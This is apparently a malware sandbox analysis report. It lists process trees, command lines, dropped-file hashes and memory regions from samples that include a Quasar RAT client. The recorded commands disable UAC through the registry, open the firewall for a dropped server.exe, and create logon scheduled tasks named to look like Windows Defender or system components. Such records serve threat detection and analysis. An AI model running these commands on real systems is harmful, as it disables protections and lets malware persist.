/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\mac.exe

"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"

C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe

"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"

C:\ProgramData\GoogleDat\GoogleUpdate.exe

C:\ProgramData\GoogleDat\GoogleUpdate.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "146272486713716370342146452761-283201182191764725351370645312104548451266761744"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1436

C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1623540158-857654453-1397294642-1169686346-53308944714274225182089971389-345946265"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat" "

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto

Files


C:\Users\Admin\AppData\Local\Temp\Wagon

MD5 aceb4987ea23e89dc0ff759872b4150b
SHA1 d0afee14ceb4cd5b5b8a312fc59375099915a415
SHA256 e5c79f935df843f966f156b4af4f8705f43b51107ff046272bfbccbf2914be94
SHA512 26d1d78914e018bfa54be1bf347c1265e2b3009a1c988e43ac499644770a6b771dd427d0cf5c89c902e3728967feb6e96493f37da34c3ba8cfd86de8f9fda253

C:\Users\Admin\AppData\Local\Temp\a\T.exe

MD5 78fc1101948b2fd65e52e09f037bac45
SHA1 ba3fc0499ee83a3522c0d50d9faa8edcbd50ad44
SHA256 d3c5ed75f450a48329ca5647cb7d201ba347bd07138ee9b43716df56dd7a1dc2
SHA512 e89ffe3f5e15bbffd0cacf596439b622827fa9ca5eac2fcfd6617b84660673df18a0b50f27fda04310204f7501819865c54dc60a2ee092af8d5ce83ce4d048f4

memory/3376-2352-0x0000000000350000-0x000000000035C000-memory.dmp

memory/3412-2353-0x00000000012C0000-0x00000000012CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\access.exe

MD5 5af2fd64b9622284e9cb099ac08ae120
SHA1 96976bf0520dd9ec32c691c669e53747c58832fb
SHA256 e6546048ed1bbfb903629cb7ec600c1bfc6e7085ea96e73022747f38f19730ce
SHA512 a393b2017a53c6b768761bab71439e280ef7ba357930b2c912aea338d66800b04d969f8716d5c19714e34d71d9c436dc2e97282a5a712f46d5f0d7bfa0f956e3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fbd05102c8374a62bd7499d637cae4d3
SHA1 0059c9b61b3e43042d3e45cf85c3649b847c323d
SHA256 0f81bdc217ac036071778659f9675a97a76d1d7aac8e1da9efe61eaafdd95d82
SHA512 9b830442926121798db880a6f666477c3bf25b4ff55466cde528e24041d55aed7288443a5c59d393ca272f69eaf64e92e852f356c51cea181b9316686f41c600

C:\Users\Admin\AppData\Local\Temp\8OSwd5ln.xlsm

MD5 62e74ecd6ec06707769b9f11a834cff4
SHA1 db415d5089841348fe661c5de71e5e11172ad2e1
SHA256 d6c6caba6d9614f8d149816a0613e96325eeac9a65b4c6508ab8184eeae173aa
SHA512 d89e7ac76899f04b4f646eda6014db9766d086aa4ca50b9b5cbe7a21381a508dcad356d487ca711ea50ed4701652412f2abbf7cff1ec78f043881b8f3f97e482

C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat

MD5 e6623ee7abdc47b3fba09e0137b4dcce
SHA1 1d5d9e87170008950543847b9a39d305d0f3bcf0
SHA256 8698699a2f723ea9bb101a90a61387d3cf27eff3698b7b488781271cc38e9e4b
SHA512 36c3f6c0626b1139074c418313a3877c3804d4b986d4d3bc4437eefb5a6d3d086d2805adc084f225c2292004d961bc63f45f2eb6bb819b48b8f9177cfdc3aec7

C:\Users\Admin\AppData\Local\Temp\E1E67F00

MD5 a78baf2a9c27e828e7a16f64c86ca5cc
SHA1 a5d0abc67e14088f4f0883d62888f1b7fc8da84e
SHA256 d796b8ac7b82605e9eb9fa7e8ad3614bec69e73fa6f92a0dec9dddef2ca33513
SHA512 ef541a545ecfa9426ccba2df22e74018e7dcc18dc8b102ab93f57030173a5501137e1b20971e805537f0ea2579df977fa5b40aa3c21c069466e46df7fc9bde3d

memory/3012-2546-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8OSwd5ln.xlsm

MD5 e4fe7122e073cb1f3e6d5eb99a9e8028
SHA1 7cf4b78631fe0a2f1aa1142967523f8851eee2fa
SHA256 b1fba5ea90b53f9f7bf489e3d2303ef9f80f8fe4de1ed3104b459fdf5acff679
SHA512 cd16535a9b3bcdc926bfbb9a4f2d83883342624d0e9d28ce13367c89f5f70d9aad2148910cca73bb04c26272a3690ff9182c96fb78ffd9a72a2cafdb10a6987b

C:\Users\Admin\AppData\Local\Temp\8OSwd5ln.xlsm

MD5 d5824ba0273b380d0506cf94bd2480df
SHA1 51b76a4aa88cf08b013a0709f0225eeeedf68f76
SHA256 5c227e0082a6b333ae77e56d05f8b57e4c8a980f44024dd97c88bfe62be264ea
SHA512 87fcfff7e5e46dd29a0ece91a82fa3540068d373602658795ffaff9c4e17e4d2ae270d3d71df1dcea8f59fc451c2d5e4f343c622562e8e8bd29f1cb66d710ddf

C:\Users\Admin\Desktop\~$StepInitialize.xlsx

MD5 ff09371174f7c701e75f357a187c06e8
SHA1 57f9a638fd652922d7eb23236c80055a91724503
SHA256 e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8
SHA512 e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882

C:\Users\Admin\AppData\Local\Temp\a\99999.exe

MD5 cd49dea59efe62d7288c76280c38f134
SHA1 35097c84b9dad414b72022eb368ccb0e4be5563d
SHA256 fa536d889affb81391ee202980d417e82cee0b46d97da4070b4a4e2052d33d82
SHA512 4ba0d5686108ef423fa2b841c1a3e3def225a0fb1165885e66c7ae5d8422b998fd89338d7eefb51cf752a9dbca6d869146973d0a131d71a09c4b9da40e10e1b7

C:\Users\Admin\AppData\Local\Temp\8OSwd5ln.xlsm

MD5 51fc1d7f32d86e23571a6d09893b7a97
SHA1 eb5311e53d11bfd3df80226fa3a5af9b23a2fceb
SHA256 d43d4a12891e2df2cad360a51716ee310ba2b4b8b92a905ad985a1c18c00650a
SHA512 215488e2252152e9c609ca0a76457366467f1b1e7ee26cb9dc1a68069f529eb230f300dfaebd9a3acd5bef602c20483802a7db197f8b498d76ac835b074df636

C:\Users\Admin\AppData\Local\Temp\a\22.exe

MD5 448478c46fe0884972f0047c26da0935
SHA1 9c98d2c02b1bb2e16ac9f0a64b740edf9f807b23
SHA256 79738b58535815ae65f86122ebd5a8bf26c6801a3238e6be5a59b77a993b60b2
SHA512 aa4cee4c1bbb7adc82ea8389519155a6aef0d19db94ab32678ade2fda8cdc333d38d3513164a91195fc7c674271b593289840504aa452542d18092eadc4c6fa9

memory/3376-2611-0x0000000000480000-0x00000000004A8000-memory.dmp

memory/4748-2612-0x0000000000980000-0x0000000000992000-memory.dmp

memory/4864-2618-0x0000000000BE0000-0x0000000000F04000-memory.dmp

memory/2600-2621-0x0000000001160000-0x00000000011B4000-memory.dmp

memory/2000-2627-0x00000000008C0000-0x00000000008FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\rea.exe

MD5 29b622980bc32771d8cac127961b0ba5
SHA1 895a13abd7ef4f8e0ea9cc1526350eccf1934b27
SHA256 056cdf4a67164ded09385efec0912ccbb1c365c151d01b0a3633de1c4d410a18
SHA512 7410b6413f4177d44ad3b55652ca57e3d622c806e423286a3ae90dd8026edb3552d304fde3c2b82ee0b8ef3dc4ba0e4a185d0d03be96d9fa5f8be7347592db95

C:\Windows\System32\dll32\msinfo32.exe

MD5 25befffc195ce47401f74afbe942f3ff
SHA1 287aacd0350f05308e08c6b4b8b88baf56f56160
SHA256 b67121c19394013d4e3fec0fcb138471e5ee51ebfafb296cc597afc0d256799f
SHA512 a28796538d64edaf7d4ba4d19e705211c779230a58b462793dab86ed5f51408feab998cf78ffe808819b4dc27cbaa981cd107887e0d5c7b0fb0f2bbca630973e

memory/4708-2647-0x0000000000180000-0x00000000004A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe

MD5 0b9c6adaad6b250ad72923c2014b44b0
SHA1 7b9f82bef71e2d4ddfc258c2d1b7e7c5f76547fe
SHA256 1a9dc2fbfe2257278e6452872cdbd18c50bf5c7142dd04c772f1633a7f20fd0d
SHA512 3b9e734d09e8f01751d370aaff2cbe68ecaf18ec78ef6cc97974ff1ab8c5fe8db2b8b942e86b4b15e8f2657f5f5141088ca0cbe5b845b878732d3bed521aa0b7

memory/3376-2706-0x0000000001F30000-0x0000000001F40000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84I4P9TMI6MI20UPKXE0.temp

MD5 6a482f21c87bb3bf147f5226ab020c9e
SHA1 fc2b85e24bedeb5048b6b6e8ef25a50a21dfd08d
SHA256 b4a898451fe37a1b92b8152e7016eb74b1e56c29ca67710d0c6f85ad421707c8
SHA512 f98176fa8c5fc431bec562568f70c0aa1886ba170b8310ac4c4022b4519a77d99e349fd252f8b70a836f8bb389dfd300e8ef8bf475ca11f741e0e4a9a9fcbf55

C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat

MD5 c7f17ca2d073986dd1c2c6d3b289f6d7
SHA1 a1720ea6cad3abf29d5a5dc9e1fe9fa3086c6923
SHA256 eaf00b260c1f1c5447b8334602e437549fec86a4b332dcb489b539c3a1d1400a
SHA512 f432d1d3aea46f7a38bd8e9dce914a751c8eea086c0d887b16de8dd23c7df67e9e04a61c0c257fc89ec2ec8556f6dc519834a127096afee2852de7d8cb7b9373

memory/4572-2745-0x000000001B570000-0x000000001B852000-memory.dmp

memory/4572-2747-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJ9EWK04CP4K245DCTGW.temp

MD5 f85e951852a2477565b0a137ed37052d
SHA1 acc84e27b34c22e0125c27004cab88e2447f388c
SHA256 bc8790b2072d081cdd3e914f800f27aac7333f409555346ced3e55f8cec3c7da
SHA512 6cd2a46392a877a7387b978e5283e5a99a0d1e572e253df23d30fc99c3383db6794c36661ec2db3a63c14e1744bb3aecdfa6933ede1957c5106d05fcb1061bd0

memory/3320-2786-0x0000000000240000-0x0000000000258000-memory.dmp

memory/3320-2785-0x0000000000240000-0x0000000000258000-memory.dmp

memory/3320-2787-0x0000000000F60000-0x0000000000FEC000-memory.dmp

memory/3320-2789-0x0000000003C40000-0x0000000003DEA000-memory.dmp

memory/3156-2788-0x000000001B620000-0x000000001B902000-memory.dmp

memory/3156-2790-0x0000000002870000-0x0000000002878000-memory.dmp

memory/2584-2812-0x000000001B670000-0x000000001B952000-memory.dmp

C:\Config.Msi\f7703e9.rbs

MD5 911f0850afbfe0d2e6cc412072b39149
SHA1 f28f3dacbc9987c035b3ff3994b940d5880b7964
SHA256 285280254eadee754267c645e790b195fec0d56a8c59fe06dab9b731338ee9f8
SHA512 6d6610e3a4e206082734b721e94510daba3f00e50d3dbd015dff6ba78402db26a362d124e0a6acf3fe6c9a0f695951ad62c81a5cfdc69986300efe2788641eed

memory/3320-2845-0x0000000000AC0000-0x0000000000AF6000-memory.dmp

memory/3320-2846-0x0000000000E20000-0x0000000000E61000-memory.dmp

memory/3320-2847-0x0000000003330000-0x0000000003402000-memory.dmp

memory/1784-2849-0x00000000003B0000-0x00000000003E6000-memory.dmp

memory/1784-2848-0x0000000000880000-0x0000000000916000-memory.dmp

memory/1784-2852-0x0000000001FB0000-0x000000000203C000-memory.dmp

memory/1784-2853-0x000000001B320000-0x000000001B4CA000-memory.dmp

memory/1784-2854-0x0000000000410000-0x0000000000428000-memory.dmp

memory/1784-2855-0x0000000000550000-0x0000000000568000-memory.dmp

C:\Users\Admin\AppData\Roaming\Network.exe

MD5 31c81fac210cd56abb84ff55ede0365b
SHA1 ca8a86da38e111f01ad04c9c537162be2af5f842
SHA256 f26dcdf460a3da96cedebca9baccca6947bea8f89e3a801118b9cd40da14bfa8
SHA512 11d21b79a689a3689470e975d25247639c9a0eba266f70c8d5168b94a06975dc98537206cf753f9a436ee679969a9820f6ffa63fb15852ca05cf0fdf8fdf6eba

memory/3264-2888-0x0000000000D60000-0x0000000001084000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat

MD5 660b0065748fe582165dbe286a98f454
SHA1 80eefb00aecdbfa5a60dee59c49162c0f54f9beb
SHA256 8c3cd7e30528b83cf3cfce9a330f49f60aaf4e5ead092a638373f98f0d647747
SHA512 7f740bef70db167b0c96afef669106dc76d22cc60dbe8476fc8732dc7ef1bd34c99239a4efbd778241351e594f676c1c23f0e5a2d783200b1dde6d00f3fb696b

memory/3088-2902-0x0000000000160000-0x000000000019C000-memory.dmp

memory/3088-2901-0x00000000010E0000-0x00000000011E6000-memory.dmp

memory/3088-2903-0x00000000001A0000-0x00000000001B0000-memory.dmp

memory/3088-2904-0x00000000004A0000-0x00000000004D0000-memory.dmp

memory/3088-2905-0x000000001AD70000-0x000000001AE20000-memory.dmp

C:\Users\Admin\AppData\Roaming\soniC\logs.dat

MD5 83a7c07cd696ea13b0724eedfe0a1ca4
SHA1 b3998121b1edf746f2e29ea5cf758cb54b4b2f05
SHA256 7571c1f97df8e2b3a1a8fb5a686cb6511620a50114330eeed3546a6d31bd107f
SHA512 a30ed893fc46ceab521fbcb6995b0ad4a6239bdfcf3d91ab6f8504acbe6f9f1bf5b70eae3570cf1b2ca110fa3a2caadd2d8f2784d2e874480714b0d15c4c62a1

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

MD5 e9987ac76debe4d7c754f30cec95d618
SHA1 7678e6011456d26f579c7dcdd238ff651cfa4edd
SHA256 56510920355a5531d174cb55ebe86f4b0d85c748d0e15dd78849a29f0f3763d1
SHA512 919003b30226a8cc81540f652ae51301641325516a5d9bbba140b293b3b97141fbd9274a2f1e942b75e618f57d6e02799e488b36f2cdcbc35f48cc9cc5594771

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

MD5 25443271763910e38d74296d29f48071
SHA1 269a7dd9ff1d0076a65630715f5bd4600a33bb0d
SHA256 3bf2449588aaea6f7b7f984af24bd889ee438bb33d9331f5990ef9b6184695e8
SHA512 185d233076e4727bf1471f579e2fb56725e30a1f1d4b1f70c8da03d389f41d879eba3731f6daedb34edb8c073df90ca3c0df19362f7b174c72bd6a1251d67aea

memory/4500-2925-0x00000000000B0000-0x00000000003D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

MD5 170766dd706bef08f2d36bb530ea2ac6
SHA1 eadac1229aab8aa35b88982010bb3b7af3fd8537
SHA256 b11ef309a0b65e448d06275293b125714f6a9a796eed61aba45b70eca4ec9176
SHA512 9f35ea79804cc478a011c3397a00847c6a93569d7a3913a7674c53b62a516c14bf5aab1250fc68bc310016cb744f0f247f5b1019b5fb9c6388688f5f35e0b187

C:\Users\Admin\AppData\Roaming\app

MD5 5014379cf5fa31db8a73d68d6353a145
SHA1 2a1a5138e8c9e7547caae1c9fb223afbf714ed00
SHA256 538b830838cbf62e6ce267b48e2eb165030686e5b6317f0b1e9205a3e08c73b8
SHA512 5091a16ef7730449601a70b5ef5512a93c98c76beb8cfee1adc9d39780c49b1d712e764720b04e44e18c7b08633c5d453793462c18dc6bef14d82bf69892e18f

C:\Windows\System32\Windows Shell Interactive.exe

MD5 aad11067aa90b9d96958aae378c45747
SHA1 13dc757a06a092ab0ef34482c307604a67fd74b9
SHA256 2787d416bf228915debc5d9c9e058cc246f8da7217c706d8a1fe0cb788a9155b
SHA512 8a2fc9cfc72b7f9fb0ff54292022d738013813f222ebe3d7e54f1d916a6307d7652a5f4276d38550e6c515e637358b039a3f784e70a187e2d754b60eaff26813

memory/4520-2943-0x0000000001380000-0x00000000016A4000-memory.dmp

memory/2044-2948-0x0000000000080000-0x0000000000096000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat

MD5 5535f86af6f01799056c73acf479c36a
SHA1 417083fa2d4df6806d984f499cdd4f8cf7102207
SHA256 57c08f6bc6fa0b81076a9358dd8dfbe25a918bf5468dc644485b2b31b017f75e
SHA512 69c0f976f6c433c0c6bd74433b7ba237ad5c8248106f1949e1ed346422bcd0fde35740529e0ff980f1b7fe7b607c030e1e966af2817174b79e595fcd919b33ee

memory/1660-2957-0x0000000001380000-0x00000000016A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat

MD5 050b65097d99a3384c91a3af92db83bf
SHA1 f893cd87ffc2acff72c96e655921a9c605d202b5
SHA256 949dedc5efb8ecbe51410825b272d12bcfff290ebae6449852606241f77f5bea
SHA512 9d6fd460d605190691483ac3f773f45c99f80ac80d51c1b92891740776c0fcf169ad67c39c42df69f8b357a78ce76b9bfa40017a610b1c0eca6f5a9b7fd7ddf7

C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat

MD5 2f75915dee93570da94a915b57f00428
SHA1 d91660e7f70a9dd38223a628be9827a882571780
SHA256 e31fc98f93e073348edd07d12608edffc6dcdf1c840f24e9b8e127879e540de9
SHA512 0cb716b97e9902837978893c2fdfc618a64749bbbbcf7164e1bd6ae9f7bfea656ae8a2e2fa62b171916835ae02854e75f140ae557a3f050fd8bd8a448e0b8225

C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat

MD5 8efd953620b528235f220e6bd7ef6b18
SHA1 e4fe30029e355c2a1f815c88e339882c4acbae70
SHA256 eb6696427f2fe07cdae5519bd557359dc8c1843b006c8cfabbd9471a6064efa1
SHA512 dbf7c6437d9acc3afa9bce5dc220a49a7a8fd36c0f1de734ec67b95f33eda2c8dc8c74b0dbaec18faa5da799d1a7dd6ecb634d2351b633376b783488d802abfa

memory/4704-3139-0x0000000000150000-0x000000000018E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat

MD5 e786756be477a5d970f1250113955a4c
SHA1 fadd264327514db5f6da8c42d2cc4680fecf90a3
SHA256 fd302fa9911e7e63c71868961ec83de51efcb5c745a311dd9640f59690215e4d
SHA512 dfd6af7dd6c7018a73406239d62959f616fbc2658e7f2a345dac3143ea93bd794faaa20ec79915cfcd7d4524b1e4a55585bdfa7e6754ff49c337c4ef47e9ec6f

C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat

MD5 eb75a66aba873ae314915140c48db01d
SHA1 e77d18374530a30a5d068ddf887806602e7d6bc4
SHA256 256bf7b5c70028d7db9bcbd49f6418a6c8fabf1d783c182e56284555e0541147
SHA512 2322f8d4b6db7bcdb3028d33054289e6bbcf8ec2b52ddc198ae4d26cb31204f6050a97538094e0d95ccf53acef12c96cfcc5d00f376dcfc59d1846839f8456ae

C:\Users\Admin\AppData\Local\Temp\melt.txt

MD5 298802dff6aa26d4fb941c7ccf5c0849
SHA1 11e518ca3409f1863ebc2d3f1be9fb701bad52c0
SHA256 df99fdbdf7b92b29b1bf1ca4283b4de2e04643b9739d2d1089ab5808e8e5665d
SHA512 0301017dfef1b74855d6535f3fd542257689479cb933c2e8742b5b6b94e26107fa38e7fc21bdb83d45184750eced344856092330fb30a1ebbc24b2b9004c8946

C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat

MD5 fbfd9369aace198ef80b9fdeab6864b3
SHA1 a0c9ad74b50e8b23be26d313953116d324e57bcd
SHA256 89690b44c9c1e557b1d1d37473894d3fb4489cc737a41d96d4aedf94162b675c
SHA512 54c7ae58f62aa7706ad45753b5c485a3152693c9fbfec8ff215f590e39f19eaf1931721b27239689fb8b696f0b8f8adc966c9f2a17bd1b36e4e7320c60aa8e1f

memory/536-3331-0x0000000000250000-0x0000000000574000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat

MD5 67b80a39054528fc4f026dbc891309c6
SHA1 b61c2e7258ef908bb971fa1edcffc7049502a408
SHA256 7e058173e15dcff6e2afe27553178dcfd5c539f7f1af932fb9a1a66148d0d403
SHA512 a7ea28e7455ea91be65c29ca4563d1cc5c0c8ef177c76bc76133fcc8d41a4b9aab43952066e7f58d9dcd7d95d6e259da1a124f3749d45d9647b78267daca7890

C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat

MD5 13dfac99595ee08f5a0806cd54de0cf2
SHA1 8d847d07450fdd0c2888cb9d3d288f8a79f73ddb
SHA256 6682e60ed1ed0509e6848842d0c36a5ab3fcf7c2d14cbb66d9862b1f24b0fb57
SHA512 a5b137e6e8a26d28613734d1d106754a56f0a5b8014b7aa14d585887c630619fbab2c3de20be631c26510bfd6c6f7ba8e4cb22490c29d5b7b10d722fbf7a6347

memory/2012-3427-0x0000000000D00000-0x0000000001024000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat

MD5 a59a3e74231a568fcb1e6b2924be89f4
SHA1 1f2bad01b6abd0038746980e9ec6c3fb599a50ee
SHA256 7ebd19c7178b08a4f74576f1f57dc4ce3b69aecafe48186561480ccfaeec825f
SHA512 09b7f572da9396accb7432e2c43b17da1c32c3661b2e6af78d26b935ba7e490ff32c5e360bcf08bec367474059956f94c7d1809b6cc2862ab60347628ba33435

C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat

MD5 691c4e0f2823309525711935d3e9d1da
SHA1 07ffbd5095feca40ace6d835e829332a07cebde3
SHA256 457d4cf25cf8b7327f57feb1485a62a308be943a56b1c44e5e97cc4056be091d
SHA512 d4b22625fc7d807a32a2fcc2dcfb4d0ad3fa462c0a5ba4668948ca2ca15f17ae3985a0c429c18bc441b5be9a9681f7ef31510a0d30c80c82b3a331396fa158f7

memory/3108-3495-0x0000000001300000-0x0000000001624000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat

MD5 813ad27351c64cd255419e999e39194b
SHA1 ae5f8741732626d3859c06eac54ba58a14d3525b
SHA256 05dc9d7d5eb94d8660ca6717be223c949196e7d343177193af6f5de1dd83620d
SHA512 ae4152e5c9b5b06d1061a11a568218f8e48009a7363f2b6816c2693164c59f509a7827a22603e9cc8f2026ac97700cea5fe3caba4ff0f92d7a60d7a121f46b5e

memory/3112-3551-0x0000000000900000-0x0000000000C24000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 5da0a355dcd44b29fdd27a5eba904d8d
SHA1 1099e489937a644376653ab4b5921da9527f50a9
SHA256 e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f
SHA512 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6

memory/5084-3562-0x0000000000810000-0x0000000000B34000-memory.dmp

memory/4956-3612-0x00000000008A0000-0x0000000000BC4000-memory.dmp

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

MD5 d4a776ea55e24d3124a6e0759fb0ac44
SHA1 f5932d234baccc992ca910ff12044e8965229852
SHA256 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c
SHA512 ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b

memory/4644-3616-0x00000000008E0000-0x0000000000C04000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat

MD5 9f90cd2f71eb081ca49723618b590f48
SHA1 f5979dd693e29674534363991a5c81ee72a360a4
SHA256 ee42c816740cd2041c7fe0468f7428fd867c1fc52385c1fa6678e4344c295fc0
SHA512 e888bbabb997c7c1a7a9a129b52e945721a4b21a90fd2ff9213518d556a46c8086e4489d333fd39a4db2e900444c65bb4e86e47f5b6f4d11036ac2b29654a4c3

C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat

MD5 173ecaead14c1fb024d5ad0931a16c12
SHA1 0ba26e25c07445743eb3007465d2f6ad3dffc277
SHA256 422b69910e2f28aef577e7692d0c37a95483275b5231bbae845404c1e787eb9e
SHA512 6c4988dfbc3ab9477b1be1d3362ba79b0a141f7e7a19c967b86e8c95f9ecd65775f30ef78892cec4bd660ae850fc65749aaabd4a126ed71019b601214e7834af

memory/888-3677-0x0000000000130000-0x0000000000150000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat

MD5 8d1a743f270c76527479866fa8fdf02f
SHA1 db51256fd48ea3021753219dc116f8ec89cbda86
SHA256 11df1786f3d18fcb202d46f3ad8ad47e765692dc49dee4efe11b62b6f8c9310c
SHA512 dd7635ddbe2c365e8c2cc0fb4486d270fa5892f6d6ff455c9f7d920ec221cb66f0f4ea88e19c85ee34ce2d5310c6c4ca4a649fdf14b41a30f92f56d81f14ae9f

memory/2320-3729-0x0000000000AE0000-0x0000000000E04000-memory.dmp

memory/3440-3763-0x0000000000F60000-0x0000000000F9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat

MD5 a55c1246884622d2d569fc00a60e3e19
SHA1 97107e929bbe8601229093e5bbff64dac1123b07
